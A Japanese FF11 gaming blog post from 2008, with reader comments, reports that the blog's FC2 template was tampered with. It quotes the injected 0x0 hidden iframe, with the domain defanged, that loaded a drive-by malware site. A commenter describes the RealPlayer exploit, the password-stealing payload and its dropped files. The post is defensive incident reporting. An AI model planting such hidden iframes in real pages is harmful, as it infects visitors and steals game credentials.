忍者ブログ
一匹の見習い黒ミスラが、ペット狩りでLv75を目指すブログ。
2017 . 12
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • プロフィール
    Profile
    カウンター
    最新CM
    [11/01 時空を超えた通りすがり]
    [10/17 時空を超えた通りすがり]
    [10/16 時空を超えた通りすがり]
    [05/31 つかさ]
    [05/08 ペルタ]
    [04/28 シコウ]
    [04/24 名無しのペット狩り]
    [04/12 最近踊り上げ始めたタルっ子]
    [04/08 白猫]
    [04/06 はごろも]
    [04/01 Azul]
    [03/31 とんろぶ]
    [03/28 chai]
    [03/23 黒樽とっきー]
    [03/21 ふるふるオレンジ♪]
    カテゴリー
    ブログ内検索
    リンク
    アクセス解析
    ×

    [PR]上記の広告は3ヶ月以上新規記事投稿のないブログに表示されています。新しい記事を書く事で広告が消えます。

    こんにちわ!第七猫です!皆様大変ご心配をおかけしました(;^ω^)ノ

    ここ数日で、2件ほどですが「当ブログよりウイルスが検出された」とのコメントを頂き急遽では
    ありますが対応をさせて貰いました。

    さて、最近のFF11における事情を考え万が一があってはイケナイと思い、ブログを一時的に
    プライベートモードに設定し、原因がある程度分かるまで公開を控えておりました。
    訪れてくださった多くの方にご心配をお掛けしました事、心よりお詫び申し上げます。

    それにしても、ブログからウイルス検出とはどういう事なんでしょうか?

    今回の一連の流れをご説明致します。
    特にFC2ブログをご利用の方、是非ご一読下さい。

    ?2/27に非公開コメントにて、当ブログを開いた際にウイルス検出されたとのコメントを頂きました。

    ?2/29に非公開コメントにて、再びウイルス検出されたとのコメント頂きました。

     (2/27の方とは別の方で、詳細なスキャン結果をコメント頂いております)

    以下抜擢(マカフィーで検出された結果らしいです)
    ----------
    コンピューター上で実行されたスクリプトから項目が検出され、削除されました

    検出名:Exploit-MS06-014(ウィルス)
    プロセス:iexplore.exe
    プロセス説明:internet explorer
    ----------
    コンピューター上で実行されたスクリプトから項目が検出され、削除されました

    検出名:Exploit-Realplay(ウィルス)
    プロセス:iexplore.exe
    プロセス説明:internet explorer
    ---------

    ?万が一を考え、ブログを一旦プライベートモードへ(非公開へ)

    ?まずは感染の原因として自PCのウイルススキャン実施。

     →ウィルスバスター、トレンドフレックスオンラインスキャン等、複数のチェックにて問題無し。

    オンラインスキャン結果

    ?事情をFC2へメールし、連絡、自分でも原因を調査

    ?FC2様よりメールにて回答あり。(以下原文抜擢)


    >お問合せいただきました件ですが、
    >こちらで確認させて頂きましたが、今現在はその様な現象を確認できませんでした。
    >状況から察する限り、ウイルス配布サイトへのURL付きコメントが行われた可能性があります。

    つまり、ウイルス配布サイトへのURL付きコメントやトラックバックが原因では?との事。
    確かに?でコメント頂いた2/27には、怪しいコメントを1件削除した覚えがありました。

    しかし?の2/29には、そういった類のコメントやトラックバックが付いてすら居なかった為
    第七猫の中で非常に腑に落ちない…というか、完全納得できる状況にはならなかった。
    (この時?の怪しいソースも発見していた為)

    ?過去事例やwebの検索調査より、当ブログのテンプレートに怪しいインラインフレームを発見。

    過去のROさんのアカウントハック事例等から情報を得まして、当ブログのテンプレートの中に
    非常に怪しげなインラインフレームを発見。

    インラインフレームとは



    このように本文内にフレームを作成し、その内部に別のwebサイトを読み込ませて表示する事。
    (環境や設定によっては正常に表示されない事があります。フレーム内はFF11公式ページです)

    この機能非常に便利なようですが、実はとんでもない使い方ができる訳でして…
    この「別のwebサイトを読み込む」というのが非常に危険(;^ω^)

    なんとなく…分かりますよね?

    普段コメントやトラックバックに付く、怪しいURLがもしこの別のWebサイトに指定されていたら…
    そしてこのインラインフレーム、縦横の幅を指定できるんです。
    上の公式は縦:300、横:500ピクセルで表示していますが、実は縦横0ピクセルまで設定可能。

    つまり別Webサイトを読み込み、そのフレームサイズが0×0だった場合…

    何も表示されないのに、怪しいURLをクリックした事と同様の事が起こるという訳です。
    ((( ;゚Д゚)))ガクガクブルブル

    インラインフレーム


    そして今回第七猫が見つけたインラインフレームは…
       ↓
    <iframe src=http://www■dda3■net width=0 height=0></iframe>

    これは…!?こんなインラインフレーム前からあったっけ?という感じ。

    つまり縦0×横0のフレーム内に、www■dda3■netを読みこめ。という物。

    そしてこのアドレスをAguseさんでチェックしたところ…

    調査

    香港付近のサーバーで、確かにちょっと嫌らしく意味不明なサイトが…
    さらにはジャバスクリプトで s111■cnzz■com というサイトへ繋がっている模様…?
    これは怪しい。チェッカーではNG判定が出なかったモノの、これは第七猫からすると非常にグレー

    ?このインラインフレームを発見した事をFC2に報告し、テンプレート内の上記インラインフレーム削除
    もしくは、上記アドレスの安全性の調査を依頼。


     著作権や広告等の絡みもあり、テンプレートの軽はずみな修正が出来なかった為。

    ?休日にも関わらずFC2より返信あり。

    ちょっと驚く内容で以下抜擢、原文のまま−−−−−
     (アドレス部分のみ修正箇所あり)

    >お問い合わせいただきました件ですが、
    >ただちに
    ><iframe src=http://www■dda3■net width=0 height=0></iframe>
    >こちらのタグを削除していただくか、テンプレートを
    >変更していただきます様お願いいたします。
    >
    >また、第三者により、テンプレートを改造されてしまった
    >可能性がございます。
    >パスワードを第三者に想定されないようなものに
    >変更していただきます様お願いいたします。
    >
    >弊社側でも引き続き調査をいたします。
    >ご通報ありがとうございました。

    FC2からの回答はなんと、上記のタグをただちに削除するか、
    テンプレートを変更しろとの事!
    Σ(゚д゚lll)ガーン

    そしてもっと衝撃的だったのが…

    「第三者により、テンプレートを改造されてしまった可能性」

    あくまで可能性の一つですが、確かに考えられない事も無い。
    果たして第七猫のFC2IDをハックしたのか?それともFC2のテンプレートを直接改竄できる
    状態だったのか?詳しい事は分かりませんがどちらにしろ問題です。

    ?第七猫のFC2IDのパスワード変更し、テンプレートからインラインフレームを削除。

     そして3/1のブログ公開へという流れです。

    とりあえずは…

    ・感染元の主原因として考えられた自PCからのウイルス検出が無かった事

    ・怪しいインラインフレームの削除を指示され、それを対応済みな事

    ・FC2IDのパスワードを変更済みの事


    以上の条件が揃いましたので、ある程度の安全性が確保されたであろとの判断です。

    FC2ブログをお持ちのブログ主様、是非一度ご自分のブログのソースを開き

    <iframe で検索を掛けてみてください!意図せぬ所にインラインフレームの記述があった場合は
    直ちにFC2に連絡、もしくは内容の修正をする事をお勧め致します。
    もちろんFC2IDのパスワード変更もお忘れなく。

    今回ウイルス検出とのコメント頂けたお二方、情報ありがとうございました

    それにしても怖い世の中だぁ〜(´;ω;`)
    PR
    ■ この記事にコメントする
    お名前
    タイトル
    文字色
    URL
    コメント
    パスワード
    Vodafone絵文字 i-mode絵文字 Ezweb絵文字
    ■ コメント一覧
    無題
    がんばれー
    tさん / 2008/03/02(Sun) /
    コメントありがとうございます!
    To tさん

    こんにちわ!第七猫です!( ^ω^)

    いやー的確な一言ありがとうございます(笑
    なんとか怪しいと思われる所は潰せたと思いますが…
    まったく身に覚えが無かったのでどうしていいかサッパリで(笑
    しかもブログからウイルス検出なんて、どうしろと…(´;ω;`)ブワッ

    とにかくFC2からの対応も素早く、非常に助かりました。
    原因がハッキリしないのが悔しいですね…(´・ω・`)
    FC2からの最終的な調査結果が来ると嬉しいんですが…
    第七猫さん / 2008/03/02(Sun) / URL
    無題
    大変な事起きましたねぇ とりあえず危険を回避できたことを非常に嬉しく思いますヽ(*´∀`)ノ
    そして第七猫さんこれにめげないで色々と頑張ってください!(金策とk・・・・げふんげふん

    PS 黒75になり今は保険稼ぎに頑張ってます 第七猫さんのブログのお陰で装備や戦術等参考にしまくってここまで上げることが出来てすんごい感謝してます <(_ _)>
    おっちょさん / 2008/03/02(Sun) /
    無題
    大変でしたなあ。こちらのサイトをコピーして丸ごと罠サイトを作ったのかと思ったら、こういう手があったとは・・・私も気をつけよう。念のためにPOLパスワードも変えておくか。パスワードハックは自衛が基本だと思う。皆さんも十分気をつけて。
    ヒゲエルさん / 2008/03/02(Sun) /
    無題
    お疲れ様でしたー。何が起こったのかと思いましたが、なるほどウィルスとはー。
    以前からFF関係のサイトに怪しげなアドレスを貼ったりする事件とか、色々ありましたし今回の件も似たようなものなのでしょうか。しかし、やはりというかなんというか…中国…。

    とりあえず一段落ということで、これにめげず頑張ってくださいね。いつも更新を楽しみにしております!
    僕も第七猫さんの記事を横でみつつ、ウガレピを卒業してテリガンのうさたんと戯れ中です(笑)

    トカゲめ…!
    おでん臼樽さん / 2008/03/03(Mon) /
    無題
    こんちゃす(^O^)/

    しかしエラい目に会いましたね(泣)

    INT4な私には何の事やらチンプンカンプンですが、何か大変だというふいんき(変換出来ない)はなんとか感じました!
    そしてその「何か大変な事」を短時間で解決する第七猫様はやはり格が違った!
    これからも第七猫ワールドを楽しみにしています(・ω・)/
    十六夜猫さん / 2008/03/03(Mon) /
    無題
    こんにちは、はじめまして。
    今回うちのブログでもウィルス発見報告がありまして
    大慌てでイロイロ検索していたらこちらに辿りつきました。
    おかげ様で無事にデストロイしてやりました。
    本当に助かりました(*゜―゜)

    そしてこちらが大変参考になったのでリンク付きで紹介させていただきました。
    ダメと言われても取り消せませんのでよろしくお願いします。

    やまびこ薬には散々わらかしていただいてお腹が痛いです。なんとかしてください。
    R-typeさん / 2008/03/03(Mon) / URL
    無題
    ≪2008.3.3 バージョンアップ≫

    [システム関連]

    ウィルス対策が完了しました。

    [魔法関連]

    白魔法ウィルナにウィルス検知とスパイポッド削除の効果が加わりました。

    [アビリティ関連]

    第七猫侍にオートやまびこが追加になります。

    ○効果
    瀕死の際に全てのアイテムがやまびこの効果。
    加えて第七猫侍が涙目になります。

    てゆう夢をみましたお( ^ω^)

    ウィルス対策お疲れ様でした。
    個人的にfc2ブログを使ってますが怖いですねー。
    気をつけなくては。
    Iceさん / 2008/03/03(Mon) /
    コメントありがとうございます!
    To おっちょさん

    こんにちわ!第七猫です!( ^ω^)ノ

    いやー先週末は大変お騒がせ致しました(´・ω・`)
    気がつけばテンプレートの変な所に見知らぬインラインフレームがッ!
    危機は回避できた(と思われる)のでとりあえず一安心ですが…
    当ブログだけでなく、他のブログさんも心配ですねぇ〜。
    これが本当に悪質なハックだとすれば許しがたいヽ(`Д´)ノ

    しかし週末はウイルス騒ぎ(一人で)で、スッタモンダしてたお陰で
    金策できない!できにくい!(爆
    おお、黒75達成おめでとうございます!ヽ( ゚∀゚)/
    これからジワジワとメリポ振ってメキメキ強くなっていく黒をお楽しみ下さい!
    古代2いいよ古代2(*´Д`)'`ァ'`ァ

    To ヒゲエルさん

    こんにちわ!第七猫です!( ^ω^)

    うーん、サイトの丸コピーもありますよねぇ〜。
    手口が段々巧妙化…というか、あくどい物になってきている希ガス…(´・ω・`)
    他のブロガーさんも心配ですよね〜ヽ(´Д`;)ノアゥア...

    ヒゲエルさんのおっしゃる通り自衛が一番の対策ですね!(・∀・)b
    私も念のためPOLIDは変更しておこうかなぁー。
    しかしFC2テンプレートを直に改竄してきたとしたら…
    ((((゚Д゚;))))ガクガクプルプル

    恐ろしい事が起こる気がしますね〜(´・ω・`)
    突然の非公開、大変ご心配をおかけしました。今後とも宜しくです!

    To おでん臼樽さん

    こんにちわ!第七猫です!

    いやー突然の非公開、ご心配をおかけしました(´・ω・`)
    万が一の事も想定されたので、苦肉の策でした…
    一応個人的にはある程度原因が突き止められたので、一安心ですが…
    今後もまた起こりうる可能性が無くなった訳ではないですしねぇ…

    ホント更新を楽しみにして頂けるみなさんに感謝です(*´Д`*)=3
    ウガレピ卒業し、テリガンの兎ですかー!段差下の兎に見つからないように
    十分の注意を払ってくださいね(爆
    >トカゲめ…!
    あるあr( ^ω^)(笑

    To 十六夜猫さん

    こんにちわ!第七猫です!( ^ω^)ノ

    大変だというふいんき(何故か変換でk)が伝わってもらえただけで十分(笑
    原因を突き止めるまでの間はマジ涙目でどうしようかとガクプルでしたが(爆
    ある程度特定できた感じはするので、一安心でしょうか…
    今後も無いとは言い切れないのが不安ですが((((゚Д゚;))))ガクガクプルプル

    そりゃーもう、第七猫ちゃん必死!(笑
    いつも涙目締めになっていた不具合も、今回の件で修正されr…

    (;^ω^)<ないない…(おいィ?)

    To R-typeさん

    こんにちわ!第七猫です!( ^ω^)

    おおおおお、同じ症状に見舞われましたか!?Σ( ̄ロ ̄ll)
    リンク先もまったく同じでしょうか?もしテンプレートが改竄されたとすると
    2/27位が濃厚なのですが…((((゚Д゚;))))ガクガクプルプル
    他ブログ様でも同じ症状が見て取れるとすると、テンプレートの改竄が怪しい?

    自分の所だけだと余り事を荒げたくなかったですが、同じ症状のブロガーさんが
    いらっしゃるとウカウカしてられませんねぇ…(´・ω・`)
    あ、参考リンク光栄です、ありがとうございます!
    こちらからも通常リンクにドゴンと追加させてもらいますね(笑
    ええ、お断り不可能ですので諦めてくだしあ(爆

    To * 2008.03.03 12

    こんにちわ!第七猫です!( ^ω^)ノ

    こちらこそ、大変有益な情報誠にありがとうございました!
    とってもとっても助かりました(*´Д`*)=3
    * 2008.03.03 12
    進んでとても助かりました。涙目で感謝です(´;ω;`)ブワッ

    いやー、コメント頂いているのにそんな事しませんよ(・∀・)b
    特に最近のFF11事情は…危ないですね〜気が抜けません(´・ω・`)
    黒上げ完了で、次青とか…お前は俺かっ!?(爆
    是非是非参考にして頂き、ペット狩りを楽しんでもらえると幸いです!
    また何かありましたらドシドシコメント下さい!( ^ω^)ノ

    To Iceさん

    こんにちわ!第七猫です!( ^ω^)

    そのBA履歴見てフイタ(爆
    オートやまびこの特性…これは神かッ…((((゚Д゚;))))ガクガクプルプル
    瀕死の際に全てのアイテムがやまびこの効果とか、腹筋崩壊です。
    本当にありがとうございました(爆

    FC2のブログ、是非お気をつけください!
    テンプレート改竄とかマジで洒落にならないですよね(´;ω;`)ブワッ
    今後も第七猫の涙目語録、お楽しみくだしあ(爆
    いやいや、本当は武勇伝のはず…(;^ω^)
    第七猫さん / 2008/03/03(Mon) / URL
    無題
    こんにちは、緋色近@ぺってんです。
    この件に関しまして、ウチのブログにコメント入れて頂きまして、ありがとう御座いました。

    見事に張られてましたね、<iframe>タグ。

    こちらの記事へリンクさせていただきます。
    FC2利用者、かなりの数やられてるんじゃないですかねぇ。。。
    ただ、第三者によるテンプレート改竄の場合にしても、ウチのPCからキーロガー含めてトロイ系ウィルスは検知されてないんですよねぇ、どこでパスワードが漏れたんだろう・・・

    もしかしてFC2の方から直接漏洩…ってこともありえますね…怖いなぁ

    情報提供ありがとうございました!
    緋色近@ぺってんさん / 2008/03/03(Mon) /
    コメントありがとうございます!
    To 緋色近@ぺってんさん

    こんにちわ!第七猫です!( ^ω^)

    早急のご対応ありがとうございます!
    いやー週末テンテコマイでしたが、なんとも恐ろしい
    結果になったものです…
    また何時再発するか分からないので、これからはちょくちょく
    チェックするようにしますが、ウカウカしてられないですねぇ(´・ω・`)

    確約が取れないのが心残りですが、サーバーの位置が
    限りなくグレーなので用心に越した事は無いですね…
    ともあれ私のPCからもウイルス検出はされておりませんので
    FC2へ直接ってのが疑わしいかもですね…ヽ(´Д`;)ノアゥア...

    また何かありましたら連絡致します。
    今後とも宜しくお願いします(・∀・)
    第七猫さん / 2008/03/03(Mon) / URL
    無題
    いやぁ、最初あのページ見たときは閉鎖したのかと思いましたよ。

    いやいや、復帰なによりです。

    それにしても中国・・・おそるべし?
    アイドルマスターきーすさん / 2008/03/04(Tue) /
    無題
    はじめまして、某青魔道士のFF11雑記と言うブログをFC2で管理している者です。

    当方でもテンプレートの改竄を確認いたしました。
    改竄された内容はURLも含め同じものです。
    フッター下あたりに入れられておりました(´д⊂
    注意を促す記事にてリンクさせていただきましたのでご連絡にあがりました。
    某青魔道士さん / 2008/03/04(Tue) /
    無題
    dda3が罠サイトです。利用する脆弱性はRealPlayerで、
    スクリプトを見る限り多くのバージョンに対応しています。

    dda3がダウンロードし実行するのは/sys.exeで、検体をVirusTotalでスキャンしましたが珍しく「全滅」です。
    RealPlayerは最新版の11でも「現時点で」大穴が開いており、塞がれていません。アンインストールを推奨します。

    バイナリを見る限りLineage2のパス抜きと思われますが、他にも機能はあるかもしれません。
    ブログのテンプレート書き換えが「もし」頻発しているなら2つ考えられます。
    ・FC2本体が(社内の誰かが踏んだなどで)食われた←あまり考えたくない。
    ・貴殿がどこかで踏んで、それがブログの管理画面のIDとパスを送信した。←ありがち。

    もうひとつのcnzzは単なるアクセス解析です。ブログやWikiなどへの爆撃の効果を計る
    (本隊と爆撃部隊は分業と思われます)のと、警察やアンチウイルスベンダから
    アクセスされた場合のとんずら用でしょう。
    解析人さん / 2008/03/04(Tue) /
    コメントありがとうございます!
    To アイドルマスターきーすさん

    こんにちわ!第七猫です!( ^ω^)ノ

    アイドルマスターフイタ(爆
    いやしかし先週末はご心配をおかけしました…
    本当に中国おそるべしですよね(´・ω・`)
    もうなんというか…なりふり構わずというかね…
    必死だなッ!って感じでしょうか。

    テンプレート改竄なんて恐ろしい事になるなら
    今後も気が抜けませんね〜。
    怖い世の中だなぁ((((゚Д゚;))))ガクガクプルプル

    To 某青魔道士さん

    こんにちわ!第七猫です!( ^ω^)

    そちらでもテンプレートの改竄が見られましたかッ!Σ( ̄ロ ̄)
    これだけ多発しているとなると、管理者それぞれが罠を
    踏んで…という風には考え難いですね…
    まぁ可能性はゼロじゃないですが…
    しかし迅速な対応ありがとうございます。

    しかし私が青ソロをやっている時、メリポ絡みの戦闘指南で
    とても良く参考にさせて頂いたサイト様の管理者様から
    コメント頂けるなんて光栄です(爆
    どうしてもインプ5チェーンできません、本当にあr(ry
    こんな時になんですが、リンク張らせて貰います!
    ヘディバ行く前に熟読させて貰います!(;^ω^)

    To 解析人さん

    こんにちわ!第七猫です!( ^ω^)

    これは…非常に細かい解析ありがとうございます!
    第七猫本人もソースチェッカーは掛けたんですが、当人の
    拙い知識では十分な理解は出来ず…(;´д`)ゞ
    なるほど…リネ2のパス抜き…しかし他の可能性も否定できないと
    なるとこれは黒サイトと断定して良さそうですね。

    また次の記事でも注意発起させて貰いますので、この
    コメントを引用させて貰って宜しいでしょうか?
    しかし数多くのサイト様から報告を貰っているんで、原因を
    考えると冷や汗が出そうですね…(´・ω・`)
    FFがインストールされているPCで、あまりWebは徘徊しない物で
    ちょっと心当たりが薄いんですよねぇ…
    ともあれ詳細な解析、本当に頭が下がります。
    情報、誠にありがとうございました!
    第七猫さん / 2008/03/04(Tue) / URL
    無題
    >コメントを引用させて貰って宜しいでしょうか?
    どぞどぞ。

    あと読み返して気になったのが一点。
    >ウィルスバスター、トレンドフレックスオンラインスキャン等、複数のチェックにて問題無し。
    これどっちも基本的に同じ物です(トレンドマイクロ社のウイルスバスター)。
    正直ウイルスバスターはあまり…なので、「等」に
    Kaspersky(個人的におすすめ)、Symantec、McAfeeあたりが含まれているならかまいません。
    解析人さん / 2008/03/04(Tue) /
    コメントありがとうございます!
    To 解析人さん

    こんにちわ!第七猫です!( ^ω^)

    コメント引用の了承、ありがとうございます。
    あー、ウイルススキャンの件ですが確かに書き方があまり
    よくなかったですね(汗
    「等」にはマカフィーとシマンテックを含みます。
    ウイルス発見で頂いていた情報が、マカフィーでの検索結果だったので
    マカフィーでもやっています。ご配慮ありがとうございます(人^ω^)

    しかしKasperskyさんの方でもう対応されていませんか?
    もし対応済みならKasperskyさんでも一度スキャンかけておく
    べきでしょうねぇ〜(;^ω^)
    いやはや恐ろしい世の中だ…(´・ω・`)
    第七猫さん / 2008/03/04(Tue) / URL
    無題
    今朝9
    Kasperskyでは13
    感染していた場合、
    Trojan-Downloader.Win32.Agent.khm (Kaspersky, AntiVir)
    Trojan-PSW.Win32.Nilage.cbr (Kaspersky)
    Trojan.PWS.Gamania.7795(Dr.WEB)
    などで検知します。
    解析人さん / 2008/03/04(Tue) /
    無題
    追記です。
    感染した場合は krnb32drv.dll および vvsg.bat を投下します。
    いずれかのファイルが存在した場合は間違いなく感染しています。
    解析人さん / 2008/03/04(Tue) /
    コメントありがとうございます!
    To 解析人さん

    こんにちわ!第七猫です!( ^ω^)

    さらに詳細な情報、大変ありがとうございます!
    まとめから追記して新たにエントリーを作成します。
    それにしても検体を送付して、各社の対応の話は非常に
    参考になりました!(笑

    上記(というか現時点で検出可能なKaspersky)でのウイルススキャン
    もしくはファイル検索でHDD内部からkrnb32drv.dll および vvsg.batが
    出てこない事を祈るばかりですね…
    一つ一つのレスが非常に勉強になるものばかりで
    本当に心強いです!
    これを発見した時、私一人でグー先生に聞いてももちろん
    分からずで…ソースの検索だけで精一杯でした…(´・ω・`)
    また何かありましたらご連絡よろしくお願いします!
    まとめ追記エントリーを作成致します。
    第七猫さん / 2008/03/04(Tue) / URL
    無題
    こんにちは、はじめまして。
    [FF11]-まったり行こうよ!さんから寄せていただきました。
    罠サイト本当に怖いですね。
    私もFC2にブログを持っていますので、早速検索もかけて見ましたが、どうやら今の所は大丈夫のようです。
    大変わかりやすい記事を書いてくださってありがとうございます。
    ぱぴさん / 2008/03/05(Wed) /
    コメントありがとうございます!
    To * 2008.03.05 04

    こんにちわ!第七猫です!( ^ω^)

    そうですね〜同じFC2ブログを使っている方ならある意味
    血の気の引く思いですよね…(´・ω・`)
    知らない間に自分のブログがウイルス配布サイトになる訳で
    そりゃぁもうガクプルモンでした(;´д`)ゞ

    トラックバック有難うございます!
    もし宜しければリンクもついでに張らせて貰いますね(・∀・)b
    あ、第七猫ちゃんアクティブリンクですかr(爆

    To ぱぴさん

    こんにちわ!第七猫です!( ^ω^)

    罠サイト、本当に怖いです…((((゚Д゚;))))ガクガクプルプル
    というか、今回はテンプレート改竄で自分のブログがその
    怖い罠サイトになtt(ry
    ホント、身の毛もよだつ思いでした(´・ω・`)

    本日、簡単にまとめをアップしましたのでまたお暇あれば
    覗いてみて下さい!皆さんから寄せていただいた情報を
    まとめてみました。
    犯人ゆるすまじ…(#^ω^)ですよね!
    第七猫さん / 2008/03/05(Wed) / URL
    無題
    初めまして。墨樽と申します。

    私もFC2でFF系ブログを書いているもので、本記事を拝見させて頂き、大変ショックを受けました。
    参考にさせて頂ければと思いましたので、当ブログから、警告記事と共に参考リンクとして当該記事を張らせて頂きました。

    事後報告になりましたが、何とぞ、ご容赦下さい<(_ _)>
    墨樽さん / 2008/03/05(Wed) /
    驚きました・・・
    初めまして^^
    FC2ブログで 無料!オンラインゲーム を運営しているむーんと申します
    とにかく 驚きました というか もう絶句

    あわてて当方でもいろいろと準備し 多くの方にこのことを理解して頂けるよう警告記事掲載しました
    事後報告ではありますが リンクさせていただいてます えっと TBもはらせていただきました(^^;

    とにかく お疲れ様でした
    第七猫様の素早い行動により 多くの方が助けられたことだと思います
    本当に ありがとうございました^^
    むーんさん / 2008/03/06(Thu) / URL
    コメントありがとうございます!
    To 墨樽さん

    こんにちわ!第七猫です!( ^ω^)

    ほんと…今回の件は驚きましたよ…(´・ω・`)
    見つけた時はなんだこりゃ〜って感じでしたが、記事を書きながらその
    恐ろしさにガクプルになったもんです(;´д`)ゞ
    注意発起の記事、お疲れ様です〜。
    リンク、トラバは自由に飛ばしてもらって構いませんよ!(・∀・)b

    今後は1日1回必ず自分のブログをチェックするという、なんだか悲しい
    状況になりました(汗
    被害が出ない、広がらない事を祈るばかりですねぇ…
    しかし犯人には第七猫の特大エターナルフォースブr(ry
    をプレゼントしてやりたいぜ(#^ω^)ビキビキだお

    To むーんさん

    こんにちわ!第七猫です!( ^ω^)

    ええ、私も当ブログにコメントくださっていた解析人さんのコメントを
    見ながら段々とその恐怖が伝わってきました…
    ((((゚Д゚;))))ガクガクプルプル
    今まで以上のセキュリティ意識向上が必要みたいですね〜…

    3月頭の時点では、ほぼ全てのウイルスチェッカーで全滅していたとか
    恐ろしすぎですよね…(´・ω・`)
    今回のウイルスで被害者が出ない、広まらない事を祈るばかりです。
    TBとリンク了解しました。コチラからもカウンター撃っときます(笑
    第七猫さん / 2008/03/06(Thu) / URL
    無題
    初めまして。
    貴重な情報ありがとうございます。

    当ブログのサイドバーに、警告と共にこちらへのリンクを貼らせて頂きましたので事後となりますがご報告です。

    本当に色んな手口を思いつきますね…。
    ちょろさん / 2008/03/06(Thu) / URL
    コメントありがとうございます!
    To ちょろさん

    こんにちわ!第七猫です!( ^ω^)ノ

    リンクの報告、ありがとうございます!(*´Д`*)=3
    参考にして頂けて幸いです!本当に色んな手口を使ってきますね…
    これまで以上にセキュリティ意識を高めないといけないですねぇ。

    ちょろさんのフレや仲間にも十分注意を促しておいて下さい!
    それではアクティブリンクの第七猫さん、こちらからもカカッと
    リンクを張らせて頂きますよー!\(^o^)/
    第七猫さん / 2008/03/07(Fri) / URL
    無題
    はじめまして!
    「[FF11]−まったりいこうよ!」様から、今回の事を知り、やってきました。
    管理人様には、わかりやすく現象と原因を説明していただいて、感謝しております。
    私のブログでも、一層の注意を喚起する意味で、記事を書きたいと思いますので、勝手ではございますがこちらの記事を引用させてください。
    少しづつですが、できることから対策をしていきたいと思います。

    気軽にブログを見て回ることもできないなんて、悲しいですよね。(´;ω;`)
    今度は、じっくりと記事を読みにお邪魔しますね。

    「いずみのたるたる絵日記」管理人・izumiでした。
    izumiさん / 2008/03/07(Fri) /
    無題
    初めてコメントさせていただきます。

    わかりやすい情報ありがとうございます。
    とても助かりました。
    自分もFC2を使っているので今回の件、とてもびっくりしました。
    見てくださっている方や自分にも一層の注意を促すためにもこちらの記事を引用させていただきたいと思います。

    こちらのブログを実は前々からよく拝見させて頂いていたのですが、まさかこのような形で初コメントすることになるとは(ノД`)
    じゃにさん / 2008/03/08(Sat) / URL
    コメントありがとうございます!
    To izumiさん

    こんにちわ!第七猫です!( ^ω^)

    記事の紹介、注意発起ありがとうございます!
    いやー確かに出来る事から少しずつとは思いますが、
    今回の件はかなり厳しい内容ですよねぇ(´・ω・`)
    気軽にネットも出来なくなるのが寂しいです!

    取り合えず第七猫は、インラインフレームの停止とプレイヤーの
    アンインストールして対策しました!是非皆さんにも
    注意を促し、万が一が無いようにしてください!
    ついでにリンクも頂きました(笑
    不都合ありましたら、ご連絡宜しくです(・∀・)b

    To  * 2008.03.07 21

    こんにちわ!第七猫です!( ^ω^)

    私もインラインフレームの削除とプレイヤーを削除する事で
    対応しました(・∀・)b
    本当万が一があると、心が折れるのは分かりますねぇ…(´・ω・`)

    しかしご指摘の部分ありがとうございました(汗
    全ての日付の月の所が8とか、どんだけ(笑
    全て2月の出来事に変換しました、ご指摘ありがとうございます!
    えーっと、2月で正解です、ゴメンヨ!\(^-^)/

    To じゃにさん

    こんにちわ!第七猫です!( ^ω^)

    本当にFC2利用している皆さんには、かなりびっくりする
    内容でしたよね〜(´・ω・`)
    周りのみなさんにも、是非注意を促しておいてくださいね〜。

    初コメ頂いたのに、内容がコレだとは!(笑
    ひとまずリンクを頂いておきますので、またお暇あれば
    遊びに来てください!(・∀・)b
    不都合ありましたら連絡宜しくでっす(人^ω^)
    第七猫さん / 2008/03/08(Sat) / URL
    はじめまして
    友人のブログでこの話を知り、リンクを辿ってこちらに伺いました。
    当方も、細々とですがFF11ブログをやっておりますので、警告文とともに、この記事へのリンクを貼らせていただきました。
    事後承諾になり申し訳ありません。

    どんどん手口が巧妙化してきて、嫌ですね……(´・ω・`)
    HTMLタグに詳しくないPC素人には、なおさら辛いかんじです。
    こちらの記事は、そんな素人にも非常にわかりやすく、参考かつ勉強になりました。
    ありがとうございました。
    秋さん / 2008/03/09(Sun) /
    無題
    お返事&リンク、ありがとうございます!
    こんな事態ですので、URLはあえて書かなかったのですが、まさか探して下さるとは恐縮です。(´Д`;)ヾ
    こちらからもリンク張らせていただきました。
    今度とも、よろしくお願いします。m(__)m
    izumiさん / 2008/03/09(Sun) /
    コメントありがとうございます!
    To 秋さん

    こんにちわ!第七猫です!( ^ω^)

    おお、記事へのリンクやトラックバックはご自由にどうぞ!
    ガンガンやっちゃって貰ってOKです!(・∀・)b
    しかし本当に手口が陰湿な物になって来てますね…

    私もどちらかというとあんまり詳しい方じゃないんですが
    見つけるのに苦労しました(笑
    ソース開いてどこがおかしいとか、見ても良く分からないですしッ!(爆
    ROのアカウントハックに関する事例がまとめてあったのが
    非常に助かりました(;´д`)ゞ
    またお暇あれば遊びに来て下さいね!

    To izumiさん

    こんにちわ!第七猫です!( ^ω^)

    いやーこちらこそリンクありがとうございます!
    気軽にURL書いてリンクお願いするのも躊躇うのは
    なんだか寂しいですよね〜(´・ω・`)

    今後も何があるか分かりませんが、気をつけていきましょう!
    またお暇あれば遊びに来て下さい!今後とも宜しくでっす!(*´Д`)'`ァ'`ァ
    第七猫さん / 2008/03/10(Mon) / URL
    無題
    はじめまして!!
    ビスマルク鯖より、FC2FF11ブロガーの危機を察知して
    すっとんで参りました。
    私自身はPS2ユーザーなのですが、
    注意を喚起したいのでこの記事を紹介させてください。
    事後報告になるのが申し訳ないですが、
    アカハック対策は早ければ早いほどよいので、
    お許し下さい。
    ブログを感染源にしないため、
    今後も頑張ってFF11を楽しみましょうぞ!!
    才谷梅子さん / 2008/07/30(Wed) / URL
    コメントありがとうございます!
    To 才谷梅子さん

    コメントの返信を
    http
    の方にまとめて書いておきますね(・∀・)
    第七猫さん / 2008/07/30(Wed) / URL
    ■ この記事のトラックバック
    この記事にトラックバックする:
    寝(ようとした)耳に水
    わたしは睡眠時間が少なくても平気な体質なので、普段から宵っ張り。 今日もコアラさん動画の記事を書いた流れで、 そのままネットサーフィ...
    URL 2008/03/05(Wed)04:15:12
    【重要】 FC2 ゲーム関係ブロガー様へ 特にFF関係は注意!
    なんとも 恐ろしい事件がおきています FC2でプログを公開されている方は 是非とも目を通してください 特に・・・ゲームブログ  中でも...
    URL 2008/03/06(Thu)13:14:27
    ブログテンプレートに埋め込まれた罠
